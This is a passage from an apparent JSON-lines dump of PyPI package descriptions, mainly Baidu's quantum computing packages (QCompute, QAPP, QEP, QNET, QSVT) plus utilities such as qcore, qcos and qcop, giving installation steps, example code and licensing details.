computing. Interested readers can refer toPhotonic Quantum Computing Simulator Tutorial.API DocumentationTo learn more about how to use QComputeSDK, please refer to theAPI documentation, which contains detailed descriptions and usage of all functions and classes available to users.DevelopmentQComputeSDK includes quantum computing architecture, quantum computing simulator, tutorials, and extensions. For developers who need to involve the code of the architecture or simulator, it is recommended to install from sources. For developers or researchers who use QComputeSDK to develop quantum algorithm applications, it is recommended to useGHZ_Cloud.pyas the code framework. Modifying and using this file can effectively help you learn the syntax of this quantum development kit. It is recommended that developers be familiar with the circuit construction of QComputeSDK, and pay attention to the qubit output order.Discussion and FeedbacksWe welcome your questions, reports and suggestions. You can feedback through the following channels:GitHub Issues/Gitee IssuesQuantum Leaf FeedbackEmail:quantum@baidu.comYou are welcomed to join our discussion QQ group (group number: 1147781135). You can scan QR code into the group.Develop with QComputeSDKWe welcome developers to use QComputeSDK for quantum application development. If your work uses QComputeSDK, we also welcome you to contact us. The following are quantum applications developed based on QComputeSDK:QEP (Quantum Error Processing), a set of quantum noise processing tools developed by the Institute for Quantum Computing at Baidu Research. It offers four powerful functions: performance evaluation, quantum error characterization, quantum error mitigation, and quantum error correction.UBQC (Universal Blind Quantum Computation), a blind quantum computing proxy service based on the UBQC protocol developed by the Institute for Quantum Computing at Baidu Research.QAPPis a set of quantum computing solution tools developed based on QComputeSDK, providing quantum computing solution services for a variety of field problems including quantum chemistry, combinatorial optimization, and machine learning.QSVT (Quantum Singular Value Transformation), a set of quantum singular value transformation tools developed by the Institute for Quantum Computing at Baidu Research, with main functions including quantum singular value transformation, symmetric quantum signal processing, and Hamiltonian quantum simulation.QFinance, a quantum finance library developed by the Institute for Quantum Computing at Baidu Research, providing a Quantum Monte Carlo method for price European options.PQS (Photonic Quantum Simulator), a photonic quantum computing simulator developed by the Institute for Quantum Computing at Baidu Research, supporting photonic quantum circuit simulation based on Gaussian state and Fock state.FAQQuestion:What can be done with QComputeSDK? What are the applications?Answer: QComputeSDK is a quantum computing development framework based on Python that can be used to build, run, and optimize quantum circuits. We have built a comprehensive and complete infrastructure in QComputeSDK to support the implementation of various quantum algorithms, it has a wide range of application scenarios in the development of quantum applications. Specific work can be referred to but not limited to theExtensionsin QComputeSDK.Question\uff1aI want to use QComputeSDK for quantum programming, but I don't know much about quantum computing. How do I get started?Answer: Quantum Computation and Quantum Information by Nielsen & Chuang is the classic introductory textbook to QC. We recommend readers to study Chapter 1, 2, and 4 of this book first. These chapters introduce the basic concepts, provide solid mathematical and physical foundations, and discuss the quantum circuit model widely used in QC. Readers can also learn onQuLearn, which is an online quantum learning knowledge base that not only contains quantum computing tutorials, but also rich video sources. Readers can also download the Quantum Leaf APP (https://quantum-hub.baidu.com/qmobile), and the Playground on the APP contains a wealth of interesting quantum examples to help readers learn anytime, anywhere.Question:Is QComputeSDK free?Answer: QComputeSDK is free. QComputeSDK is an open source SDK. It is free for users to execute local simulation tasks. When the user submits the task to the cloud simulator or the real machine through QComputeSDK, a certain number of points will be deducted. For detailed deduction rules, please refer to theUser Guide. When the user creates an account, we will give away points. The point balance can be viewed in thePersonal Center.Question:How can I get more points?Answer: Points are currently only used for resource control. If the points are insufficient, you can submit an application from theFeedbackon the Quantum Leaf website or theUser Feedbackof Quantum Leaf APP. We will deal with your request in three working days.Copyright and LicenseQComputeSDK usesApache-2.0 license."} +{"package": "qcompute-qapp", "pacakge-description": "English |\u7b80\u4f53\u4e2d\u6587QCompute-QAPP User's GuideCopyright (c) 2021 Institute for Quantum Computing, Baidu Inc. All Rights Reserved.QAPP IntroductionQAPP is a quantum computing toolbox based on theQComputecomponent ofQuantum Leaf, which provides quantum computing services for solving problems in many fields including quantum chemistry, combinatorial optimization, machine learning, etc. QAPP provides users with a one-stop quantum computing application development function, which directly connects to users' real requirements in artificial intelligence, financial technology, education and research.QAPP ArchitectureQAPP architecture follows the complete development logic from application to real machine, including four modules: Application, Algorithm, Circuit, and Optimizer. The Application module converts the user requirements into the corresponding mathematical problem; the Algorithm module selects a suitable quantum algorithm to solve the mathematical problem; during the solution process, the user can specify the optimizer provided in the Optimizer module or design a custom optimizer; the quantum circuit required for the solution process is supported by the Circuit module. The Circuit module directly calls theQComputeplatform, and supports calls to theQuantum Leafsimulators or QPUs.QAPP Use CasesWe provide QAPP practical cases such as solvingmolecular ground state energy, solvingcombinatorial optimization problem, and solvingclassification problem. These use cases are designed to help users quickly get started with calling QAPP modules and developing custom algorithms. Before we can run these use cases, there is some preparation work to do.Install Conda and Python environmentWe useAnacondaas the development environment management tool for Python. Anaconda supports multiple mainstream operating systems (Windows, macOS, and Linux). Here we provide a tutorial on how to use conda to create and manage virtual environments:First, enter the command line (Terminal) interface: Windows users can enterAnaconda Prompt; Mac users can use the key combinationcommand\u2318 + spaceand then enterTerminal.After opening the Terminal window, entercondacreate--nameqapp_envpython=3.8to create a Python 3.8 environment namedqapp_env. With the following command, we can enter the virtual environment created,condaactivateqapp_envFor more detailed instructions on conda, please refer to theOfficial Tutorial.Credit PointsIf you run QAPP with cloud servers, you will consume Quantum-hub credit points. For more Quantum-hub credit points, please contact us viaQuantum Hub. First, you should log intoQuantum Hub, then enter the \"Feedback\" page, choose \"Get Credit Point\", and record the necessary information. Submit your feedback and wait for our reply. We will reach you as soon as possible.Install QCompute and packages required by QAPPInstall QAPP withpip:pipinstallqcompute-qappSome use cases may require additional packages, which are clarified in the corresponding tutorials.RunUsers can download thetutorialsfolder from GitHub, switch the path to thetutorialsfolder where the case is located in Terminal, and run it in Python. For example,pythonvqe_example.pyAPI DocumentationWe provide QAPP'sAPIdocumentation for developers to look up. Users can also view the API documentation on theQuantum Leaf website.CitationWe encourage the researchers and developers to use QAPP for research & development on quantum computing applications. Please cite us by including the following BibTeX entry:@misc{QAPP,title={{Quantum Application Python Package}},year={2022},url={https://quantum-hub-test.baidu.com/qapp/},}Copyright and LicenseQAPP usesApache-2.0 license."} +{"package": "qcompute-qep", "pacakge-description": "Copyright (c) 2022 Institute for Quantum Computing, Baidu Inc. All Rights Reserved.About QEPQEPis aQuantumErrorProcessing toolkit developed by theInstitute for\nQuantum ComputingatBaidu Research. It\naims to deal with quantum errors inherent in quantum devices using software solutions. Currently,\nit offers four powerful quantum error processing functions: performance evaluation,\nquantum error characterization, quantum error mitigation, and quantum error correction:Performance Evaluationis used for assessing the capabilities and extendibilities of\nquantum computing hardware platforms, through estimating the error rates of quantum states,\nquantum gates, and quantum measurement apparatus. It provides\nstandard randomized benchmarking, interleaved randomized benchmarking, cross-entropy\nbenchmarking, unitarity randomized benchmarking, direct fidelity estimation, and\ncross-platform fidelity estimation methods.Quantum Error Characterizationis used for reconstructing the comprehensive information in\nquantum computing hardware platforms, through many partial and limited experimental results.\nIt provides quantum state tomography, quantum process tomography, quantum detector tomography,\nquantum gateset tomography, and spectral quantum tomography.Quantum Error Mitigationis used for improving the accuracy of quantum computational\nresults, through post-processing the experiment data obtained by varying noisy experiments,extending the computational reach of a noisy superconducting quantum processor. It provides\nzero-noise extrapolation technique to mitigate quantum gate noise, and a collection of methods\nsuch as inverse, least-square, iterative Bayesian unfolding, Neumann series to mitigate quantum measurement noise.Quantum Error Correction (QEC)is used to protect quantum information from errors due to\nenvironmental noise and imperfections in hardware. Quantum computers rely on the delicate\nproperties of quantum systems, which are susceptible to errors, and thus, QEC has become an\nessential tool for realizing fault-tolerant quantum computing. It provides a simulator that\ncan simulate error correction codes based on the stabilizer formalism, allowing users to study\nthe effects of various types of noise, assess the performance of different error correction\ncodes, and evaluate the robustness of quantum algorithms to errors.QEP is based onQCompute,\nwhich a Python-based open-source quantum computing platform SDK also developed\nbyInstitute for Quantum Computing.\nIt provides a full-stack programming experience for senior users via hybrid quantum programming language\nfeatures and high-performance simulators.\nYou can install QCompute viapypi.\nWhen you install QEP, QCompute will be automatically installed.\nPlease refer to QCompute's officialOpen Sourcepage for more details.InstallationInstall QEPThe package QEP is compatible with 64-bit Python 3.8 and 3.9, on Linux, MacOS (10.14 or later) and Windows. We highly recommend the users to install QEP viapip. Open the Terminal and runpipinstallqcompute-qepThis will install the QEP binaries as well as the QEP package. For those using an older version of QEP, keep up to date by installing with the--upgradeflag for additional features and bug fixes.Run ExamplesAfter installation, you can try the following simple program to check whether QEP has been successfully installed.fromQComputeimport*importqcompute_qep.tomographyastomography# Step 1. Initialize a quantum program for preparing the Bell stateqp=QEnv()# qp is short for \"quantum program\", instance of QProgramqp.Q.createList(2)H(qp.Q[0])CX(qp.Q[0],qp.Q[1])# Step 2. Set the quantum computer (instance of QComputer).# For debugging on ideal simulator, change qc to BackendName.LocalBaiduSim2qc=BackendName.LocalBaiduSim2# For test on real quantum hardware, change qc to BackendName.CloudBaiduQPUQian# You must set your VIP token in order to access the hardware# Define.hubToken = \"Token\"# qc = BackendName.CloudBaiduQPUQian# Step 3. Perform Quantum State Tomography, check how well the Bell state is prepared.st=tomography.StateTomography()# Alternatively, you may initialize the StateTomography instance as follows:# st = StateTomography(qp, qc, method='inverse', shots=4096)# Call the tomography procedure and obtain the noisy quantum statest.fit(qp,qc,method='inverse',shots=4096)print(\"***********************************************************************\")print(\"Testing whether 'qcompute-qep' is successfully installed or not now ...\\n\")print('Fidelity of the Bell state is: F ={:.5f}'.format(st.fidelity))print(\"Please change 'qc' to other quantum computers for more tests.\\n\")print(\"Package 'qcompute-qep' is successfully installed! Please enjoy!\")print(\"***********************************************************************\")Note that more examples are provided in theAPI documentation,\ntheQEP Tutorials, and the source\nfile of QEP hosted inGitHub.\nYou can get started from there.TutorialsQEP provides detailed and comprehensive tutorials for performance evaluation, quantum error\ncharacterization, quantum error mitigation, and quantum error correction,\nranging from theoretical analysis to practical application.\nWe recommend the interested researchers or developers to download the Jupyter Notebooks and try it.\nThe tutorials are listed as follows:Performance EvaluationStandard Randomized BenchmarkingInterleaved Randomized BenchmarkingCross-Entropy BenchmarkingUnitarity Randomized BenchmarkingDirect Fidelity Estimation of Quantum StatesDirect Fidelity Estimation of Quantum ProcessesCross-Platform Estimation of Quantum StatesQuantum Error CharacterizationQuantum State TomographyQuantum Process TomographyQuantum Detector TomographyQuantum Gateset TomographySpectral Quantum TomographyQuantum Error MitigationZero-Noise ExtrapolationMeasurement Error MitigationApplications of Measurement Error MitigationQuantum Error CorrectionStabilizer Code SimulatorMore tutorials and demonstrations will be included in the future release.API DocumentationFor those who are looking for explanation on the python classes and functions in QEP,\nplease refer to ourAPI documentation.FeedbacksUsers are encouraged to contact us via emailquantum@baidu.comwith general questions,\nunfixed bugs, and potential improvements. We hope to make QEP better together with the community!Research based on QEPWe encourage researchers and developers to use QEP to explore quantum error processing.\nIf your work uses QEP, please feel free to send us a notice viaquantum@baidu.comand\ncite us with the following BibTeX:@misc{QEP,author={{Baidu Quantum}},title={{Quantum Error Processing Toolkit (QEP)}},year={2022},url={https://quantum-hub.baidu.com/qep/},version={1.1.0}}Copyright and LicenseQEP usesApache-2.0 license."} +{"package": "qcompute-qnet", "pacakge-description": "Copyright (c) 2022 Institute for Quantum Computing, Baidu Inc. All Rights Reserved.About QNETQNET is a Quantum NETwork toolkit developed by theInstitute for Quantum ComputingatBaidu Research. It aims to accelerate the design of quantum network protocols, the testing of quantum network architectures and the deployment of quantum internet standards. QNET provides a fully-featured discrete-event simulation framework that allows for both accurate and efficient tracking of quantum network status. Its modular design provides a testbed for different quantum network architectures.FeaturesQNET is under active development and the latest version has the following key features:discrete-event simulation framework that allows for both accurate and efficient system tracking;quantum hardware interface that accelerates protocols testing and deployment;physical devices modeling that supports the simulation of realistic experiments;frequently-used templates that speed up the workflow of research and development;modular design that is compatible with different quantum network architectures.InstallationCreate Python environmentWe recommend using Anaconda as the development environment management tool for Python3. Anaconda supports multiple mainstream operating systems (Windows, macOS, and Linux). It provides Scipy, Numpy, Matplotlib, and many other scientific computing and drawing packages. Conda, a virtual environment manager, can be used to install and update the latest Python packages. Here we give simple instructions on how to use conda to create and manage virtual environments.First, open the command line (Terminal) interface: Windows users can enterAnaconda Prompt; MacOS users can use the key combinationcommand + spaceand then enterTerminal.After opening the Terminal window, entercondacreate--nameqnet_envpython=3.8to create a Python 3.8 environment named qnet_env. With the following command, we can activate the virtual environment created,condaactivateqnet_envFor more detailed instructions on conda, please refer to theOfficial Tutorial.Install QNETQNET is compatible with 64-bit Python 3.8+, on Linux, MacOS (10.14 or later) and Windows. We recommend installing it withpip. Activate the conda environment and enterpipinstallqcompute-qnetThis will install the QNET binaries as well as the QNET package. For those using an older version of QNET, keep up to date by installing with the--upgradeflag for additional features and bug fixes.Run examplesNow, you can try to write a simple program to check whether QNET has been successfully installed. For example,fromqcompute_qnet.core.desimportDESEnvfromqcompute_qnet.topologyimportNetwork,Node,Link# Create a simulation environmentenv=DESEnv(\"Simulation Environment\",default=True)# Create a networknetwork=Network(\"First Network\")# Create a node named Alicealice=Node(\"Alice\")# Create another node named Bobbob=Node(\"Bob\")# Create a link between Alice and Boblink=Link(\"Alice_Bob\",ends=(alice,bob))# Build up the network from nodes and linksnetwork.install([alice,bob,link])# Initialize the simulation environmentenv.init()# Run the network simulationenv.run()Note that more examples are provided in theAPI documentation. You can get started from there.TutorialsWe provide severaltutorialsto help users get started with QNET. These include:Introduction to discrete-event simulationTour guide to quantum network simulationMicius quantum satellite experimentQuantum network architecture simulationQuantum network architecture with resource managementQuantum network protocols on quantum hardware devicesQuantum teleportationQuantum entanglement swappingCHSH gameMagic square gameMeasurement-based quantum computationDynamic quantum circuitMore tutorials and demonstrations will be included in the future release.API documentationFor those who are looking for explanation on the python classes and functions provided in QNET, please refer to ourAPI documentation.FeedbacksUsers are encouraged to contact us via emailquantum@baidu.comwith general questions, unfixed bugs, and potential improvements. We hope to make QNET better together with the community!Research based on QNETWe also encourage researchers and developers to use QNET to explore quantum networks. If your work uses QNET, feel free to send us a notice viaquantum@baidu.comand cite us with the following BibTeX:@misc{QNET,title={{Quantum NETwork in Baidu Quantum Platform}},year={2022},url={https://quantum-hub.baidu.com/qnet/}}Copyright and LicenseQNET usesApache-2.0 license."} +{"package": "qcompute-qsvt", "pacakge-description": "Copyright (c) 2022 Institute for Quantum Computing, Baidu Inc. All Rights Reserved.About QSVT ToolkitQSVTtoolkit is aQuantumSingularValueTransformation toolkit based onQComputeand developed by theInstitute for Quantum ComputingatBaidu Research. It aims to implement quantum simulation and other algorithms on quantum devices or simulators more conveniently. Currently, it includes three main modules:Quantum Singular Value Transformation(QSVT) is used for implementing singular value transformations of quantum operations, whose input and output are both block-encodings of quantum operations.Symmetric Quantum Signal Processing(SQSP) is used for encoding such transformation functions and completing such quantum circuits in QSVT. SQSP is introduced for implementing the encoding step more effectively.Hamiltonian Simulationis one of the most significant applications for QSVT, and even quantum computing. It provides functions to generate quantum circuits for time evolution operators of Hamiltonians.QSVT toolkit is based onQCompute, a Python-based open-source quantum computing platform SDK also developed byInstitute for Quantum Computing. It provides a full-stack programming experience for senior users via hybrid quantum programming language features and high-performance simulators. You can install QCompute viapypi. When you install QSVT toolkit, the dependency QCompute will be automatically installed. Please refer to QCompute's officialOpen Sourcepage for more details.InstallationCreate Python EnvironmentWe recommend using Anaconda as the development environment management tool for Python3. Anaconda supports multiple mainstream operating systems (Windows, macOS, and Linux). It provides Scipy, Numpy, Matplotlib, and many other scientific computing and drawing packages. Conda, a virtual environment manager, can be used to install and update the latest Python packages. Here we give simple instructions on how to use conda to create and manage virtual environments.First, open the command line (Terminal) interface: Windows users can enterAnaconda Prompt; macOS users can use the key combinationcommand + spaceand then enterTerminal.After opening the Terminal window, entercondacreate--nameqsvt_envpython=3.9to create a Python 3.9 environment namedqsvt_env. With the following command, we can activate the virtual environment created,condaactivateqsvt_envFor more detailed instructions on conda, please refer to theOfficial Tutorial.Install QSVT ToolkitQSVT toolkit is compatible with 64-bit Python 3.9, on Linux, macOS (10.14 or later) and Windows. We recommend installing it withpip. After Activating the conda environment, then enterpipinstallqcompute-qsvtThis will install the QSVT toolkit binaries as well as the QSVT toolkit package.For those using an older version of QSVT toolkit, update by installing with the--upgradeflag. The new version includes additional features and bug fixes.Run ExamplesNow, you can try to write a simple program to check whether QSVT toolkit has been successfully installed. For example, run the following program,importnumpyasnpfromQComputeimport*fromqcompute_qsvt.Application.HamiltonianSimulationimportfunc_HS_QSVTfunc_HS_QSVT(list_str_Pauli_rep=[(1,'X0X1'),(1,'X0Z1'),(1,'Z0X1'),(1,'Z0Z1')],num_qubit_sys=2,float_tau=-np.pi/8,float_epsilon=1e-6,circ_output=False)we will operate a time evolution operator on initial state $|00\\rangle$ for Hamiltonian $X\\otimes X + X\\otimes Z + Z\\otimes X + Z\\otimes Z$ and time $-\\pi/8$ with precision1e-6, and then measure such final state.Note that more examples are provided in thesource codes,tutorialsandAPI documentation. You can get started from there.TutorialsQSVT toolkit providesquick startfor using the Hamiltonian Simulation module, as well as abrief introductionto the theories for users to learn and get started. The current content of the following tutorial is organized as follows, and it is recommended that beginners read and study in order:Brief IntroductionQuantum Signal ProcessingBlock-Encoding and Linear Combination of Unitary OperationsQuantum Eigenvalue and Singular Value TransformationHamiltonian SimulationWe will supply more detailed and comprehensive tutorials in the future.API DocumentationFor those who are looking for explanation on the python classes and functions in QSVT toolkit, please refer to ourAPI documentation.FeedbacksUsers are encouraged to contact us via emailquantum@baidu.comwith general questions, unfixed bugs, and potential improvements. We hope to make QSVT toolkit better together with the community!Research based on QSVT ToolkitWe encourage researchers and developers to use QSVT toolkit to explore quantum algorithms. If your work uses QSVT toolkit, please feel free to send us a notice viaquantum@baidu.comand cite us with the following BibTeX:@misc{QSVT,title={{Quantum Sigular Value Transformation toolkit in Baidu Quantum Platform}},year={2022},url={https://quantum-hub.baidu.com/qsvt/}}ChangelogThe changelog of this project can be found inCHANGELOG.md.Copyright and LicenseQSVT toolkit usesApache-2.0 license."} +{"package": "qComputing", "pacakge-description": "No description available on PyPI."} +{"package": "qcon", "pacakge-description": "qcon is program for hiding/showing terminal emulators(or other software) with a hotkey.\nSimilar to consoles you see in many FPS games.\nUnlike similar projects like guake/yakuake you can use any terminal emulator of your choice.\nSeveral terminals(or other software) can be configured.\nIt\u2019s compact and consists of a single file."} +{"package": "qconcurrency", "pacakge-description": "No description available on PyPI."} +{"package": "qconf", "pacakge-description": "No description available on PyPI."} +{"package": "qconfig", "pacakge-description": "open-qconfig-pyOpen Source lightweight version of qconfigQConfig EnterpriseEnterprise version available athttps://www.qsonlabs.com"} +{"package": "qconf-py", "pacakge-description": "Description for setup.pyUsage: python setup.py build\nwhich will generate the qconf_py library in build/lib.linux-x86_64-X.X as qconf_py.soParamters of Extension:\nname : the full name of the extension, including any packages ? ie. not a filename or pathname, but Python dotted name;sources : list of source filenames, relative to the distribution root (where the setup script lives), in Unix form (slash- separated) for portability. Source files may be C, C++, SWIG (.i), platform-specific resource files, or whatever else is recognized by the build_ext command as source for a Python extension.\n\ninclude_dirs : list of directories to search for C/C++ header files (in Unix form for portability);\n\nextra_objects : list of extra files to link with (eg. object files not implied by \u00a1\u00aesources\u00a1\u00af, static library that must be explicitly specified, binary resource files, etc.)\n\nlibrary_dirs : list of directories to search for C/C++ libraries at link time\n\nlibraries : list of library names (not filenames or paths) to link against"} +{"package": "qcop", "pacakge-description": "Quantum Chemistry OperateA package for operating Quantum Chemistry programs usingqciostandardized data structures. Compatible withTeraChem,psi4,QChem,NWChem,ORCA,Molpro,geomeTRICand many more.qcopworks in harmony with a suite of other quantum chemistry tools for fast, structured, and interoperable quantum chemistry.The QC Suite of Programsqcio- Beautiful and user friendly data structures for quantum chemistry.qcparse- A library for efficient parsing of quantum chemistry data into structuredqcioobjects.qcop- A package for operating quantum chemistry programs usingqciostandardized data structures. Compatible withTeraChem,psi4,QChem,NWChem,ORCA,Molpro,geomeTRICand many more.BigChem- A distributed application for running quantum chemistry calculations at scale across clusters of computers or the cloud. Bring multi-node scaling to your favorite quantum chemistry program.ChemCloud- Aweb applicationand associatedPython clientfor exposing a BigChem cluster securely over the internet.InstallationpipinstallqcopQuickstartqcopuses theqciodata structures to drive quantum chemistry programs in a standardized way. This allows for a simple and consistent interface to a wide variety of quantum chemistry programs. See theqciolibrary for documentation on the input and output data structures.Thecomputefunction is the main entry point for the library and is used to run a calculation.fromqcioimportMolecule,ProgramInputfromqcopimportcompute# Create the moleculeh2o=Molecule.open(\"h2o.xyz\")# Define the program inputprog_input=ProgramInput(molecule=h2o,calctype=\"energy\",model={\"method\":\"hf\",\"basis\":\"sto-3g\"},keywords={\"purify\":\"no\",\"restricted\":False},)# Run the calculationoutput=compute(\"terachem\",prog_input,collect_files=True)# Inspect the outputoutput.input_data# Input data used by the QC programoutput.success# Whether the calculation succeededoutput.results# All structured results from the calculationoutput.stdout# Stdout log from the calculationoutput.pstdout# Shortcut to print out the stdout in human readable formatoutput.files# Any files returned by the calculationoutput.provenance# Provenance information about the calculationoutput.extras# Any extra information not in the schemaoutput.traceback# Stack trace if calculation failedoutput.ptraceback# Shortcut to print out the traceback in human readable formatAlternatively, thecompute_argsfunction can be used to run a calculation with the input data structures passed in as arguments rather than as a singleProgramInputobject.fromqcioimportMoleculefromqcopimportcompute_args# Create the moleculeh2o=Molecule.open(\"h2o.xyz\")# Run the calculationoutput=compute_args(\"terachem\",h2o,calctype=\"energy\",model={\"method\":\"hf\",\"basis\":\"sto-3g\"},keywords={\"purify\":\"no\",\"restricted\":False},files={...},collect_files=True)The behavior ofcompute()andcompute_args()can be tuned by passing in keyword arguments likecollect_filesshown above. Keywords can modify which scratch directory location to use, whether to delete or keep the scratch files after a calculation completes, what files to collect from a calculation, whether to print the program stdout in real time as the program executes, and whether to propagate a wavefunction through a series of calculations. Keywords also include hooks for passing in update functions that can be called as a program executes in real time. See thecompute method docstringfor more details.See the/examplesdirectory for more examples.SupportIf you have any issues withqcopor would like to request a feature, please open anissue."} +{"package": "qcoptimizer", "pacakge-description": "QuantumCircuitOptimizerThis package takes any quantum circuit and selects the best Qiskit transpiler optimization level to maximize efficiency and accuracy.Github:https://github.com/TarenP/QuantumCircuitOptimizer"} +{"package": "qcore", "pacakge-description": "qcoreis a library of common utility functions used at Quora. It is used to\nabstract out common functionality for other Quora libraries likeasynq.Its component modules are discussed below. See the docstrings in the code\nitself for more detail.qcore.assertsWhen a normal Python assert fails, it only indicates that there was a failure,\nnot what the bad values were that caused the assert to fail. This module\nprovides rich assertion helpers that automatically produce better error\nmessages. For example:>>>fromqcore.assertsimportassert_eq>>>assert5==2*2Traceback(mostrecentcalllast):File\"\",line1,inAssertionError>>>assert_eq(5,2*2)Traceback(mostrecentcalllast):File\"\",line1,inFile\"qcore/asserts.py\",line82,inassert_eqassertexpected==actual,_assert_fail_message(message,expected,actual,'!=',extra)AssertionError:5!=4Similar methods are provided by the standard library\u2019sunittestpackage,\nbut those are tied to theTestCaseclass instead of being standalone\nfunctions.qcore.cachingThis provides helpers for caching data. Some examples include:fromqcore.cachingimportcached_per_instance,lazy_constant@lazy_constantdefsome_function():# this will only be executed the first time some_function() is called;# afterwards it will be cachedreturnexpensive_computation()classSomeClass:@cached_per_instance()defsome_method(self,a,b):# for any instance of SomeClass, this will only be executed oncereturnexpensive_computation(a,b)qcore.debugThis module provides some helpers useful for debugging Python. Among others, it\nincludes the@qcore.debug.trace()decorator, which can be used to trace\nevery time a function is called.qcore.decoratorsThis module provides an abstraction for class-based decorators that supports\ntransparently decorating functions, methods, classmethods, and staticmethods\nwhile also providing the option to add additional custom attributes. For\nexample, it could be used to provide a caching decorator that adds a.dirtyattribute to decorated functions to dirty their cache:fromqcore.decoratorsimportDecoratorBase,DecoratorBinder,decorateclassCacheDecoratorBinder(DecoratorBinder):defdirty(self,*args):ifself.instanceisNone:returnself.decorator.dirty(*args)else:returnself.decorator.dirty(self.instance,*args)classCacheDecorator(DecoratorBase):binder_cls=CacheDecoratorBinderdef__init__(self,*args):super().__init__(*args)self._cache={}defdirty(self,*args):try:delself._cache[args]exceptKeyError:passdef__call__(self,*args):try:returnself._cache[args]exceptKeyError:value=self.fn(*args)self._cache[args]=valuereturnvaluecached=decorate(CacheDecorator)qcore.enumThis module provides an abstraction for defining enums. You can define an enum\nas follows:fromqcore.enumimportEnumclassColor(Enum):red=1green=2blue=3qcore.errorsThis module provides some commonly useful exception classes and helpers for\nreraising exceptions from a different place.qcore.eventsThis provides an abstraction for registering events and running callbacks.\nExample usage:>>>fromqcore.eventsimportEventHook>>>event=EventHook()>>>defcallback():...print('callback called')...>>>event.subscribe(callback)>>>event.trigger()callbackcalledqcore.helpersThis provides a number of small helper functions.qcore.inspectable_classThis provides a base class that automatically provides hashing, equality\nchecks, and a readablerepr()result. Example usage:>>>fromqcore.inspectable_classimportInspectableClass>>>classPair(InspectableClass):...def__init__(self,a,b):...self.a=a...self.b=b...>>>Pair(1,2)Pair(a=1,b=2)>>>Pair(1,2)==Pair(1,2)Trueqcore.inspectionThis provides functionality similar to the standardinspectmodule. Among\nothers, it includes theget_original_fnfunction, which extracts the\nunderlying function from aqcore.decorators-decorated object.qcore.microtimeThis includes helpers for dealing with time, represented as an integer number\nof microseconds since the Unix epoch.qcore.testingThis provides helpers to use in unit tests. Among others, it provides anAnythingobject that compares equal to any other Python object."} +{"package": "qcore-nocython", "pacakge-description": "qcoreis a library of common utility functions used at Quora. It is used to\nabstract out common functionality for other Quora libraries likeasynq.Its component modules are discussed below. See the docstrings in the code\nitself for more detail.qcore.assertsWhen a normal Python assert fails, it only indicates that there was a failure,\nnot what the bad values were that caused the assert to fail. This module\nprovides rich assertion helpers that automatically produce better error\nmessages. For example:>>>fromqcore.assertsimportassert_eq>>>assert5==2*2Traceback(mostrecentcalllast):File\"\",line1,inAssertionError>>>assert_eq(5,2*2)Traceback(mostrecentcalllast):File\"\",line1,inFile\"qcore/asserts.py\",line82,inassert_eqassertexpected==actual,_assert_fail_message(message,expected,actual,'!=',extra)AssertionError:5!=4Similar methods are provided by the standard library\u2019sunittestpackage,\nbut those are tied to theTestCaseclass instead of being standalone\nfunctions.qcore.cachingThis provides helpers for caching data. Some examples include:fromqcore.cachingimportcached_per_instance,lazy_constant@lazy_constantdefsome_function():# this will only be executed the first time some_function() is called;# afterwards it will be cachedreturnexpensive_computation()classSomeClass(object):@cached_per_instance()defsome_method(self,a,b):# for any instance of SomeClass, this will only be executed oncereturnexpensive_computation(a,b)qcore.debugThis module provides some helpers useful for debugging Python. Among others, it\nincludes the@qcore.debug.trace()decorator, which can be used to trace\nevery time a function is called.qcore.decoratorsThis module provides an abstraction for class-based decorators that supports\ntransparently decorating functions, methods, classmethods, and staticmethods\nwhile also providing the option to add additional custom attributes. For\nexample, it could be used to provide a caching decorator that adds a.dirtyattribute to decorated functions to dirty their cache:fromqcore.decoratorsimportDecoratorBase,DecoratorBinder,decorateclassCacheDecoratorBinder(DecoratorBinder):defdirty(self,*args):ifself.instanceisNone:returnself.decorator.dirty(*args)else:returnself.decorator.dirty(self.instance,*args)classCacheDecorator(DecoratorBase):binder_cls=CacheDecoratorBinderdef__init__(self,*args):super(CacheDecorator,self).__init__(*args)self._cache={}defdirty(self,*args):try:delself._cache[args]exceptKeyError:passdef__call__(self,*args):try:returnself._cache[args]exceptKeyError:value=self.fn(*args)self._cache[args]=valuereturnvaluecached=decorate(CacheDecorator)qcore.enumThis module provides an abstraction for defining enums. You can define an enum\nas follows:fromqcore.enumimportEnumclassColor(Enum):red=1green=2blue=3qcore.errorsThis module provides some commonly useful exception classes and helpers for\nreraising exceptions from a different place.qcore.eventsThis provides an abstraction for registering events and running callbacks.\nExample usage:>>>fromqcore.eventsimportEventHook>>>event=EventHook()>>>defcallback():...print('callback called')...>>>event.subscribe(callback)>>>event.trigger()callbackcalledqcore.helpersThis provides a number of small helper functions.qcore.inspectable_classThis provides a base class that automatically provides hashing, equality\nchecks, and a readablerepr()result. Example usage:>>>fromqcore.inspectable_classimportInspectableClass>>>classPair(InspectableClass):...def__init__(self,a,b):...self.a=a...self.b=b...>>>Pair(1,2)Pair(a=1,b=2)>>>Pair(1,2)==Pair(1,2)Trueqcore.inspectionThis provides functionality similar to the standardinspectmodule. Among\nothers, it includes theget_original_fnfunction, which extracts the\nunderlying function from aqcore.decorators-decorated object.qcore.microtimeThis includes helpers for dealing with time, represented as an integer number\nof microseconds since the Unix epoch.qcore.testingThis provides helpers to use in unit tests. Among others, it provides anAnythingobject that compares equal to any other Python object."} +{"package": "qcos", "pacakge-description": "\u817e\u8baf\u4e91\u5bf9\u8c61\u5b58\u50a8\u5e93\uff0c\u652f\u6301\u547d\u4ee4\u884c\u5b89\u88c5\u901a\u8fc7pip\u5b89\u88c5:pip install qcos\u914d\u7f6e\u4f7f\u7528\u5b98\u65b9\u7684\u547d\u4ee4\u884c\u5de5\u5177CLI\u914d\u7f6esecret_id, scret_key\u4ee3\u7801\u4e2d\u4f7f\u7528\u53c2\u7167\u6e90\u7801\uff0c\u6bd4\u8f83\u7b80\u5355, \u8c03\u7528\u65b9\u5f0f:from qcos import Client\nclient = Client(secret_id, secret_key, region, bucket)\n# \u6839\u636e\u8def\u5f84\u4e0a\u4f20\nclient.put_local('a.txt', local_path)\n# \u76f4\u63a5\u4e0a\u4f20\u5185\u5bb9\nclient.put_object('a.txt', data='content')\n# \u68c0\u67e5\u6587\u4ef6\u662f\u5426\u5b58\u5728\nclient.head_object('a.txt')\u547d\u4ee4\u884c\u683c\u5f0f:qcos \u672c\u5730\u6587\u4ef6\u5939 region bucket cos\u6587\u4ef6\u5939\u8def\u5f84\u6bd4\u5982:qcos ./build ap-beijing testbucket-10000 /"} +{"package": "qcos_cli", "pacakge-description": "No description available on PyPI."} +{"package": "qcp", "pacakge-description": "No description available on PyPI."} +{"package": "qcPALM", "pacakge-description": "No description available on PyPI."} +{"package": "qcparse", "pacakge-description": "qcparseA library for parsing 